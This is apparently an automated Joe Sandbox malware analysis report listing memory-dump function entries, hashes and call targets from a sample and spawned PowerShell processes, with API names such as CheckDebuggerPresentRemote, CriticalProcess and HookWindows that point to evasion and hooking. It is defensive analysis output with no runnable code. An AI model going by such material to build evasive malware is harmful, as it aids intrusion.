• Call targets inside this function: 7ffaac488f40, 7ffaac480388, 7ffaac4880d8, 7ffaac480398, 7ffaac480378, 7ffaac488368, 7ffaac480358, 7ffaac4882d8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6
                                                                  • API String ID: 0-1777295168
                                                                  • Opcode ID: 82f3895074f3c1c8132097cfe21bca7fa7af708cd88d6d8647d4022da78d6bc0
                                                                  • Instruction ID: 95e1cb201671da2e3f2ca0d559a6c30a29767fc52c18b2fee0c0729bd783a1ff
                                                                  • Opcode Fuzzy Hash: 82f3895074f3c1c8132097cfe21bca7fa7af708cd88d6d8647d4022da78d6bc0
                                                                  • Instruction Fuzzy Hash: 36D252B0A18B098FE798EB28C899A7DB7E1FF99314F54457DD04ED3291DE34A8818B41

                                                                  Control-flow Graph

• Rendered graph omitted (the executed/not-executed node colouring is not recoverable from text); the function starts at 7ffaac49128a and its basic blocks span 7ffaac49128a-7ffaac491ebc
• Call targets inside this function: 7ffaac480d40, 7ffaac48c5f8, 7ffaac48c600, 7ffaac490ed0, 7ffaac48dba0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6
                                                                  • API String ID: 0-1348531229
                                                                  • Opcode ID: 655507f4f34a89e7a76ebe1ed60772e7f91f9f30b82e541ae86a377affb964a2
                                                                  • Instruction ID: f1345505be5ce665aa86aebe04b9e90519573a3734cf2efd7af9821d607a218a
                                                                  • Opcode Fuzzy Hash: 655507f4f34a89e7a76ebe1ed60772e7f91f9f30b82e541ae86a377affb964a2
                                                                  • Instruction Fuzzy Hash: 7672D660B1CB058BF758EB78845E679B6D2FF99344F54857DE40EC32D2DE28E8418782

                                                                  Control-flow Graph

• Rendered graph omitted (the executed/not-executed node colouring is not recoverable from text); the function starts at 7ffaac4812f8 and its basic blocks span 7ffaac4812f8-7ffaac481f52
• Call targets inside this function: 7ffaac480638 (called six times in a row), 7ffaac480a48, 7ffaac4804b8, 7ffaac4804b0, 7ffaac480358, 7ffaac480368, 7ffaac480378, 7ffaac481038, 7ffaac480870, 7ffaac4812f0, 7ffaac480388, 7ffaac480398, 7ffaac4803a8, 7ffaac481210, 7ffaac4809e8, 7ffaac481288
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: c09d0d5e0d83941f01999d66f3ee51f433d8aee008d36e3de659e91429b4db7b
                                                                  • Instruction ID: 8e6ebc6f71bd70c7e3a3b07e597385ad536cb73998b00d13429e9d007d11ea2d
                                                                  • Opcode Fuzzy Hash: c09d0d5e0d83941f01999d66f3ee51f433d8aee008d36e3de659e91429b4db7b
                                                                  • Instruction Fuzzy Hash: 8232E461B29A458BF794EB3CC869A79B7D2EF99304F44457AD00EC32D6DE28E84187C1

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: 415b01831805f50d95ed388e606e6318445fcfaa75a75677ff89efaf56127135
                                                                  • Instruction ID: e83c224d31d2d94fc028160089c757f8b922a8018cca610c2940c4538ca1f59a
                                                                  • Opcode Fuzzy Hash: 415b01831805f50d95ed388e606e6318445fcfaa75a75677ff89efaf56127135
                                                                  • Instruction Fuzzy Hash: 1222F661A29A498FF798E738C86DABD7BD1EF99304F40457AD00EC32D6DD28E94583C1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: fcbf18baf877737341e9ab4572d768bef57c53fdd3b814e74c6251f13904acf3
                                                                  • Instruction ID: ff6baa4228d12c041b80e5a3d4441f8f12955201362ca2a6392ada4cafca3f95
                                                                  • Opcode Fuzzy Hash: fcbf18baf877737341e9ab4572d768bef57c53fdd3b814e74c6251f13904acf3
                                                                  • Instruction Fuzzy Hash: C772B370B1D91A8FFB94FB78C499A7D66D6EF99344B508578D01EC32C6DE28EC428780
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CheckDebuggerPresentRemote
                                                                  • String ID:
                                                                  • API String ID: 3662101638-0
                                                                  • Opcode ID: f9c4c0654dc18a0c3cff3ebb37ada656dbcd2368a64fc4fa6e489df8c2b23249
                                                                  • Instruction ID: 0c7dc0f2a0f155190fdbb89a47df6dd65dec66f50a5b51acdffa3364a287fc2b
                                                                  • Opcode Fuzzy Hash: f9c4c0654dc18a0c3cff3ebb37ada656dbcd2368a64fc4fa6e489df8c2b23249
                                                                  • Instruction Fuzzy Hash: 6C3134318087588FCB58DF68C84AAF97FE0EF65321F04816BD489C7292CB34A846CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: ca660be7eb7ec9dc2ab7a60b17b470996de513a55df7cab7f480d77e1764452c
                                                                  • Instruction ID: 945fe5c1c6eb3ee60e65e14314c9c6bcbd310a05e4b02b5f2094e510a9e6b847
                                                                  • Opcode Fuzzy Hash: ca660be7eb7ec9dc2ab7a60b17b470996de513a55df7cab7f480d77e1764452c
                                                                  • Instruction Fuzzy Hash: 7651645061E6C94FE396A77898686767FD9DF97229B1801FBE0CDC71E3DD08480AC382
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80ed3cce61c44bc78109d5722c878940b55c7700c46a9bed096a879fce0174d6
                                                                  • Instruction ID: b459fe43fe472e4f7cfa397468747a3fca8a3dd68cc29d01b662cc61bd539ae0
                                                                  • Opcode Fuzzy Hash: 80ed3cce61c44bc78109d5722c878940b55c7700c46a9bed096a879fce0174d6
                                                                  • Instruction Fuzzy Hash: 5C420070D09529CFEB64EB24C459BF9B3B1FF59304F1085B9D00EA7292CE39A985CB94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9663f0fa7b1f6b97c152dc22fd06e9375e1cf50cd6aa2ec08b44d4322e38fa4f
                                                                  • Instruction ID: 9fea73a0a40a50024e9ddf2b312424473688b3fc81c2ab3b483d209afe82645e
                                                                  • Opcode Fuzzy Hash: 9663f0fa7b1f6b97c152dc22fd06e9375e1cf50cd6aa2ec08b44d4322e38fa4f
                                                                  • Instruction Fuzzy Hash: DEF19270908A8D8FFBA8DF28D859BF937D1FF55310F04826AE85DC7291CB3499458B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6b63e6a0e859ec674b47638363853ca87c9b9f6652896d854a6f6cc5b549947b
                                                                  • Instruction ID: 82305cb5e3d5855d740acc2ec54b6dcf4760e5f72ef2220993bb5307d4e8cae8
                                                                  • Opcode Fuzzy Hash: 6b63e6a0e859ec674b47638363853ca87c9b9f6652896d854a6f6cc5b549947b
                                                                  • Instruction Fuzzy Hash: ABE1C330909A4E8FEBA8DF28C8597F97BD1FB55310F04826AE85DC7291CE34D9458BC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 36f1270adfcab1476fe34b39e323a7e67f83fdb551716a9703023f19c250396b
                                                                  • Instruction ID: 6fff59c77560bedb36749b36cd09d9385df5bec6fdc476225a49fb3f8d9aa3f0
                                                                  • Opcode Fuzzy Hash: 36f1270adfcab1476fe34b39e323a7e67f83fdb551716a9703023f19c250396b
                                                                  • Instruction Fuzzy Hash: 3851B670919A1DCFDB98EF68D495AACB7F1FF59305F104469D00EE7292CA35A881CB44
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalProcess
                                                                  • String ID:
                                                                  • API String ID: 2695349919-0
                                                                  • Opcode ID: 20d2f91a4c282972569f9aabdcc70a9290288a317408f16e24c2c2616f45b300
                                                                  • Instruction ID: e69e4d61133ebf9a67cc71416e3919414d527f6397e880cb304ebf6776e490d2
                                                                  • Opcode Fuzzy Hash: 20d2f91a4c282972569f9aabdcc70a9290288a317408f16e24c2c2616f45b300
                                                                  • Instruction Fuzzy Hash: 0641273180C7488FD719DBA8D845BEA7FF4EF56311F04416EE08AC3692CB746846CB91
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2571052438.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffaac480000_file.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 04eba0974f28bc14a74b1e4cf2479574fbbec4072302fb99e9ad99315a084d19
                                                                  • Instruction ID: 6e14e12f9bf6ae9c368b2adba02b6f713e3fd5414db3198ce3201b4a6fdcb47d
                                                                  • Opcode Fuzzy Hash: 04eba0974f28bc14a74b1e4cf2479574fbbec4072302fb99e9ad99315a084d19
                                                                  • Instruction Fuzzy Hash: 7C412B3191CA4D8FEB18DB6CD84A6F97BE1EB59321F00427ED04DD3292CE74A81687C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1338477467.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7a44d39556c4bcee39ee13b34b0b24d69e1db81936427890c0ff2356b289ad58
                                                                  • Instruction ID: e3b01e8bf89d9b73e371ca90a798ebae915423c575970ad7f55da35ace25cc54
                                                                  • Opcode Fuzzy Hash: 7a44d39556c4bcee39ee13b34b0b24d69e1db81936427890c0ff2356b289ad58
                                                                  • Instruction Fuzzy Hash: C9D167B294EACE8FF7549B6898159B57BE5EF56310B0441BEE00DC72D3DD19EC098381
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337955875.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68bbf03abe460140cd3f441736d157606a64a6056189c01f15a252c3982cd673
                                                                  • Instruction ID: b15c96cd81bf3f7d54745da07850560b0db315be53c0ae654f46f185e65fdc68
                                                                  • Opcode Fuzzy Hash: 68bbf03abe460140cd3f441736d157606a64a6056189c01f15a252c3982cd673
                                                                  • Instruction Fuzzy Hash: E551C76294E7C54FE302AB6CE8764F93FB0DF53229B0981F7C0D8CA1A3D81858498796
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337955875.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 95fc27633a76b8759f46cfb79f8a934a69117e2bbae6874643126c252053c883
                                                                  • Instruction ID: 1cfa072e5c4f9a9da5252484d15055c322c2d0929c0f35d010d4d1c7f173cac1
                                                                  • Opcode Fuzzy Hash: 95fc27633a76b8759f46cfb79f8a934a69117e2bbae6874643126c252053c883
                                                                  • Instruction Fuzzy Hash: DE913C6290EBC58FF7069B6CAC5E5F43FA0EF63214F0840BBD09D87193D915A90987D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337955875.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a5c8ce58d22d4f7b79aae4dab280182dbc5d21706a26179387b67a83f3e91738
                                                                  • Instruction ID: 4b7dc558fa4de628ec5d888b06ba5d793176c3391af464b7389a11f4bdacc02f
                                                                  • Opcode Fuzzy Hash: a5c8ce58d22d4f7b79aae4dab280182dbc5d21706a26179387b67a83f3e91738
                                                                  • Instruction Fuzzy Hash: 5B11286280E7C84FE7439B348C3A0A43FB09F53205B0A40EBD089CB1B3D559994CC7A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337955875.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f73df5ff3d49833be00956e6b97a5dc06744e02ebb005b4c3250cc98d2dea81
                                                                  • Instruction ID: 00eae5a259921ca24779a8ba01cc2b4f38e39222b762dfd3d84eddcdb549bba9
                                                                  • Opcode Fuzzy Hash: 2f73df5ff3d49833be00956e6b97a5dc06744e02ebb005b4c3250cc98d2dea81
                                                                  • Instruction Fuzzy Hash: 0D31463190CB488FEB18DBACA84A6F97BE0EB96330F04816FD049C3156D675A45ACB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337527955.00007FFAAC36D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC36D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac36d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 800110170282ae6e8490cfb6cf1b9fceb4472edace9c458100a4ba4600806313
                                                                  • Instruction ID: 2a91f882ab189da926cc48d526ce2081350281cefa072a6871278bc3f3cecf45
                                                                  • Opcode Fuzzy Hash: 800110170282ae6e8490cfb6cf1b9fceb4472edace9c458100a4ba4600806313
                                                                  • Instruction Fuzzy Hash: 8041037140DBC48FE7569B289845952BFF0EF52320B1505DFE088CB1A3D625E84AC7A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337955875.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction ID: fa6fc882dfd95574baba5a2dd2e69265abbf835bfde3577d4f432220f6d2f2fa
                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction Fuzzy Hash: 4D01677111CB0C8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E892CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1338477467.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ddfe9d994fce7e9d8a2a9d6ea83c88aa6f186a0e00d4886501a5a5c5ad07a2cb
                                                                  • Instruction ID: 93a5faaed4d143630074288adf48c9570b476c992d4ed8d6818a75c5d1d642c3
                                                                  • Opcode Fuzzy Hash: ddfe9d994fce7e9d8a2a9d6ea83c88aa6f186a0e00d4886501a5a5c5ad07a2cb
                                                                  • Instruction Fuzzy Hash: 82F0BE32A8D5498FE758EB5CE4458E873E4EF55320B1180BAE05EC71A3CE26EC44C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1338477467.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf84cf4ef9a2ee9a3bdf01b0cfb5517b1e279e89a08fbe86b3b03e30a8a9162b
                                                                  • Instruction ID: 1a24b2fbcbc98cc126e3754de30d418b537c8a5005f7ffc9971a7407981258c7
                                                                  • Opcode Fuzzy Hash: bf84cf4ef9a2ee9a3bdf01b0cfb5517b1e279e89a08fbe86b3b03e30a8a9162b
                                                                  • Instruction Fuzzy Hash: 7EF0BE32ACD549CFE758EB1CE0458A877E0EF0532075180BAE04ECB063DB26EC44C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1338477467.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac550000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 0f67f249d42824971b8ef79e2b40d439f781c2b22bcaf6c900396a8ba2c50d12
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: 65E01A31B8C809CFEA68DB0CE0409A973E5EB99321B1141BBE14EC7561CB22EC559BC0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1337955875.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaac480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac540000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0c2baf7672b9af01ae06d4ca84665217bc303b3e7a9fd6a1a93e9fb0d40349dd
                                                                  • Instruction ID: 836b0ce1d5e4035ffc1e0d629a892ad778903407cb43da7e310f90172cc204fb
                                                                  • Opcode Fuzzy Hash: 0c2baf7672b9af01ae06d4ca84665217bc303b3e7a9fd6a1a93e9fb0d40349dd
                                                                  • Instruction Fuzzy Hash: D9512562ACEA8B8FF799DB1CC51157477D7EF96210B1880BAE14FC7592DE14E8098381
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1838779115.00007FFAAC540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac540000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 71e7a742ec74c92fa9542732ac9b2660148aad6eff615592b2561bbe8ca8792b
                                                                  • Instruction ID: 7c1633c17a1ffcfe37de93c479b28542c03b23212e4cafdcc7485dee51d0785b
                                                                  • Opcode Fuzzy Hash: 71e7a742ec74c92fa9542732ac9b2660148aad6eff615592b2561bbe8ca8792b
                                                                  • Instruction Fuzzy Hash: 92413872ACEA468FF7A5D728D4019B477D2EF41620B0845BAE04FC3183EE14EC0883C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC475000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC475000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac475000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a725148d1feca9426328f799974642f2685a197ab78442c8bbaf6af21ba6fdb0
                                                                  • Instruction ID: 54056fc22a1d1d8673b9ea144cbe0669042da8c9cd03b5856138e990f1d468a9
                                                                  • Opcode Fuzzy Hash: a725148d1feca9426328f799974642f2685a197ab78442c8bbaf6af21ba6fdb0
                                                                  • Instruction Fuzzy Hash: 8E41F87190DB88CFE7589F5CA84A6B97BE0FB66314F04416FD44D93252CA34A809CBC6
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC475000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC475000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac475000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 746797d965518b8977d8238a62bc24c958c5dc4918749658a4313bf94efe3406
                                                                  • Instruction ID: a9d5537cfd1181f46255dd340676e3a883565bb8e048a3f5ef321fd3663550de
                                                                  • Opcode Fuzzy Hash: 746797d965518b8977d8238a62bc24c958c5dc4918749658a4313bf94efe3406
                                                                  • Instruction Fuzzy Hash: 36312A7190C7488FEB19DB6C984A6E97BE0EB56331F04416FD04DC3152DA75A41ACB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1831636210.00007FFAAC35D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC35D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac35d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4768e7dfa9a507ae0a79b2fbf3c24b7fc3b440e1f55a8fdaf2229f03d34315a
                                                                  • Instruction ID: e57cb8ef147f0edd988d38259deaa1e9798183eb76d5c2aafb1cd5d236175a07
                                                                  • Opcode Fuzzy Hash: b4768e7dfa9a507ae0a79b2fbf3c24b7fc3b440e1f55a8fdaf2229f03d34315a
                                                                  • Instruction Fuzzy Hash: BC41137140EBC48FE7579B2898459527FF0EF57220B1905EFD088CB1A3D629E84AC7E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1838779115.00007FFAAC540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac540000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be606a0c67d03833e3b8d0585119b2d3077f9cd2e9e5e1071a7500576823d1a4
                                                                  • Instruction ID: 4c80affbc021e3bc9ee046538abf08f105416144178df8d8eda99d11c2bc8ab3
                                                                  • Opcode Fuzzy Hash: be606a0c67d03833e3b8d0585119b2d3077f9cd2e9e5e1071a7500576823d1a4
                                                                  • Instruction Fuzzy Hash: 082103629CEA87CFF3A9CB18C65117466D7EF52210B5980B9E00FC7592CF28DC089381
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1838779115.00007FFAAC540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac540000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b997c38253a6be13a2971c78033f23916f82fea05e4b44ce81749ec461c271c9
                                                                  • Instruction ID: ebf088122d21111136fe2bfe0bfadc39970f14baa3b5d3ecb7e1697b83f5d034
                                                                  • Opcode Fuzzy Hash: b997c38253a6be13a2971c78033f23916f82fea05e4b44ce81749ec461c271c9
                                                                  • Instruction Fuzzy Hash: 4C1123729CE9468FF7A4D728C45457877E6EF0162075880BAE01FC3192DF18EC488381
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac470000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction ID: bfbf926510f2c94275b7c70522523e97f2c3e2f6a14ef67711fcb719095a95a3
                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction Fuzzy Hash: 4201677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC36A1DA36E892CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.1834912402.00007FFAAC475000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC475000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac475000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5880c9eab0093c5fa87893d468456513fd9e6b9d3dc2177822c0ee011d720fa
                                                                  • Instruction ID: 9916a7ddf505a02e079d9a9a61ac8eab84a118cf6ac3029c20251045cea94f7f
                                                                  • Opcode Fuzzy Hash: e5880c9eab0093c5fa87893d468456513fd9e6b9d3dc2177822c0ee011d720fa
